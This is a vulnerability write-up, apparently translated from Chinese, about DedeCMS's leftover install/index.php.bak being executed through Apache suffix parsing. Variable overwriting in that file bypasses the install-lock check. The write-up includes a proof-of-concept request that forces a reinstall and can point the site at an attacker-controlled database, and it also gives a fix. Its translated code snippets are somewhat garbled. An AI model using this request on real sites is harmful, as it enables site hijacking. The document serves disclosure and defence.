Dedecms/install/index.php.bak installation File not Deleted && Executed Via Apache Analytic Vul

Catalog

1 . Vulnerability Description 2 . Vulnerability trigger Condition 3 . Vulnerability Impact Range 4 . Vulnerability Code Analysis 5 . Defense Methods 6. Defensive thinking

1. Vulnerability description

Summarize the causes of this vulnerability

1. Dedecms by default, after the installation is complete, the install installation directory is not deleted, that is, the installation script still exists, just renamed in order to Index.php.bak file//dedecms The installation file/install/index.php back to/install/index.php.bak after installation2. Apache has an parsing vulnerability that recursively parses a file's suffix one after the other until it is paired to a postfix handler that can be handled correctly (ext handler)//For example, Index.php.bak will be interpreted as index.php.3. DEDECMS has widely adopted"local Variable Registration"the simulation implementation, i.e./*foreach (Array (' _get ', ' _post ', ' _cookie ') as $_request) {foreach ($$_request as $_k = $_v) ${$_k} = Runmagicquote S ($_v);}*/This allows the hacker to change the normal process logic of the code by passing in the specified key variables, bypassing the dedecms"Installed status Check"Logic for re-installation

Relevant Link:

http://zhanzhang.anquan.org/vul-detail/51b19a3ff159c80f0ab0b8a1/

2. Vulnerability Trigger Condition

1 The . Install folder exists 2. Apache Parsing Vulnerability

0x1:poc

http://www.cnseay.com/dedecms/install/index.php.bak?insLockfile=1&step=4post:step=4 &dbhost=localhost&dbuser=root&dbpwd=123456&dbprefix=dede_&dbname=dedecms1 &dblang=gbk&// where dbhost can be changed to a remote hacker-controlled DB to achieve the purpose of hijacking

3. Vulnerability Impact Range
4. Vulnerability Code Analysis

/install/index.php.bak

..foreach(Array ('_get','_post','_cookie') as$_request) {    foreach($$_request as$_k = $_v) ${$_k} =runmagicquotes ($_V);} Require_once (dedeinc.'/common.func.php');//The hacker uses local variable injection to modify the value of the $inslockfile to bypass the Dede detection logicif(File_exists ($insLockfile)) {exit ("The program has been installed and if you are sure you want to reinstall it, please remove install/install_lock.txt! from FTP first ");}..

Relevant Link:

http://www.cnseay.com/2956/

5. Defense Methods

1 . Remove the Install folder or 2. Delete/install/index.php.bak3. Allow users to use the reinstallation feature, but fix the Index.php.bak

/install/index.php.bak

if (File_exists (DirName (__file__). /install_lock.txt ' ) {    exit ("The  program has been installed and if you are sure you want to reinstall it, first remove the install/install_lock.txt! from the FTP ");}

6. Defensive Thinking

Avoid using variables in key if judgments in your code, which can largely prevent the local variable from overwriting the resulting code flow black hack Injection modification

Copyright (c) Littlehann All rights reserved

Dedecms/install/index.php.bak installation File not Deleted && Executed Via Apache Analytic Vul